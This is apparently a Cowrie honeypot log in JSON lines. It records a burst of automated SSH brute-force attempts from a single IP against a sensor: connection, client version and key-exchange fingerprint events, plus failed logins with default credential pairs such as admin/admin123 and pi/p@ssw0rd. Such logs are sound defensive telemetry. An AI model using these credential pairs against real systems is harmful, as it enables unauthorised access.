{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.392557Z","src_ip":"87.120.191.13","session":"0ee251251431"}
{"eventid":"cowrie.login.failed","username":"noc","password":"p@ssw0rd","message":"login attempt [noc/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.395030Z","src_ip":"87.120.191.13","session":"f7bbd9a84983"}
{"eventid":"cowrie.login.failed","username":"admin","password":"p@ssw0rd","message":"login attempt [admin/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.456896Z","src_ip":"87.120.191.13","session":"0ee251251431"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.556215Z","src_ip":"87.120.191.13","session":"585b182d8b52"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55264,"dst_ip":"1.2.3.4","dst_port":22,"session":"edecc84f3365","protocol":"ssh","message":"New connection: 87.120.191.13:55264 (1.2.3.4:22) [session: edecc84f3365]","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.575552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.576626Z","src_ip":"87.120.191.13","session":"edecc84f3365"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.596481Z","src_ip":"87.120.191.13","session":"edecc84f3365"}
{"eventid":"cowrie.login.failed","username":"pi","password":"p@ssw0rd","message":"login attempt [pi/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:42.657905Z","src_ip":"87.120.191.13","session":"edecc84f3365"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.080623Z","src_ip":"87.120.191.13","session":"bc1ee94adf43"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55278,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5a916112b3e","protocol":"ssh","message":"New connection: 87.120.191.13:55278 (1.2.3.4:22) [session: e5a916112b3e]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.099976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.100808Z","src_ip":"87.120.191.13","session":"e5a916112b3e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.120430Z","src_ip":"87.120.191.13","session":"e5a916112b3e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.183845Z","src_ip":"87.120.191.13","session":"e5a916112b3e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.249975Z","src_ip":"87.120.191.13","session":"382f701fde9b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.253692Z","src_ip":"87.120.191.13","session":"85ad5ed6a55f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.256981Z","src_ip":"87.120.191.13","session":"85d34dfc0c37"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35000,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a0239b8d554","protocol":"ssh","message":"New connection: 87.120.191.13:35000 (1.2.3.4:22) [session: 1a0239b8d554]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.269570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.270077Z","src_ip":"87.120.191.13","session":"1a0239b8d554"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35014,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f49638371b9","protocol":"ssh","message":"New connection: 87.120.191.13:35014 (1.2.3.4:22) [session: 0f49638371b9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.274585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.275643Z","src_ip":"87.120.191.13","session":"0f49638371b9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35024,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdb2a41700c5","protocol":"ssh","message":"New connection: 87.120.191.13:35024 (1.2.3.4:22) [session: cdb2a41700c5]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.276628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.277662Z","src_ip":"87.120.191.13","session":"cdb2a41700c5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.290722Z","src_ip":"87.120.191.13","session":"1a0239b8d554"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.299772Z","src_ip":"87.120.191.13","session":"cdb2a41700c5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.301519Z","src_ip":"87.120.191.13","session":"0f49638371b9"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin123","message":"login attempt [ubnt/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.351876Z","src_ip":"87.120.191.13","session":"1a0239b8d554"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.369300Z","src_ip":"87.120.191.13","session":"0f49638371b9"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin123","message":"login attempt [student/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.371948Z","src_ip":"87.120.191.13","session":"cdb2a41700c5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.419484Z","src_ip":"87.120.191.13","session":"f7bbd9a84983"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35030,"dst_ip":"1.2.3.4","dst_port":22,"session":"23b25ba0c23f","protocol":"ssh","message":"New connection: 87.120.191.13:35030 (1.2.3.4:22) [session: 23b25ba0c23f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.439072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.447765Z","src_ip":"87.120.191.13","session":"23b25ba0c23f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.463504Z","src_ip":"87.120.191.13","session":"23b25ba0c23f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.478985Z","src_ip":"87.120.191.13","session":"0ee251251431"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35038,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7c1ab5f018b","protocol":"ssh","message":"New connection: 87.120.191.13:35038 (1.2.3.4:22) [session: c7c1ab5f018b]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.498790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.503384Z","src_ip":"87.120.191.13","session":"c7c1ab5f018b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.523314Z","src_ip":"87.120.191.13","session":"c7c1ab5f018b"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin123","message":"login attempt [noc/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.574382Z","src_ip":"87.120.191.13","session":"23b25ba0c23f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.642144Z","src_ip":"87.120.191.13","session":"c7c1ab5f018b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.703912Z","src_ip":"87.120.191.13","session":"edecc84f3365"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35040,"dst_ip":"1.2.3.4","dst_port":22,"session":"f10a2d251945","protocol":"ssh","message":"New connection: 87.120.191.13:35040 (1.2.3.4:22) [session: f10a2d251945]","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.736389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.767370Z","src_ip":"87.120.191.13","session":"f10a2d251945"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.807494Z","src_ip":"87.120.191.13","session":"f10a2d251945"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin123","message":"login attempt [pi/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:43.951020Z","src_ip":"87.120.191.13","session":"f10a2d251945"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.233421Z","src_ip":"87.120.191.13","session":"e5a916112b3e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35044,"dst_ip":"1.2.3.4","dst_port":22,"session":"de031eb0e650","protocol":"ssh","message":"New connection: 87.120.191.13:35044 (1.2.3.4:22) [session: de031eb0e650]","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.269388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.305033Z","src_ip":"87.120.191.13","session":"de031eb0e650"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.305734Z","src_ip":"87.120.191.13","session":"de031eb0e650"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.425723Z","src_ip":"87.120.191.13","session":"1a0239b8d554"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35048,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf4fced868f1","protocol":"ssh","message":"New connection: 87.120.191.13:35048 (1.2.3.4:22) [session: cf4fced868f1]","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.447905Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.450326Z","src_ip":"87.120.191.13","session":"0f49638371b9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.454988Z","src_ip":"87.120.191.13","session":"cdb2a41700c5"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35050,"dst_ip":"1.2.3.4","dst_port":22,"session":"32af80ac2a7e","protocol":"ssh","message":"New connection: 87.120.191.13:35050 (1.2.3.4:22) [session: 32af80ac2a7e]","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.473387Z"}
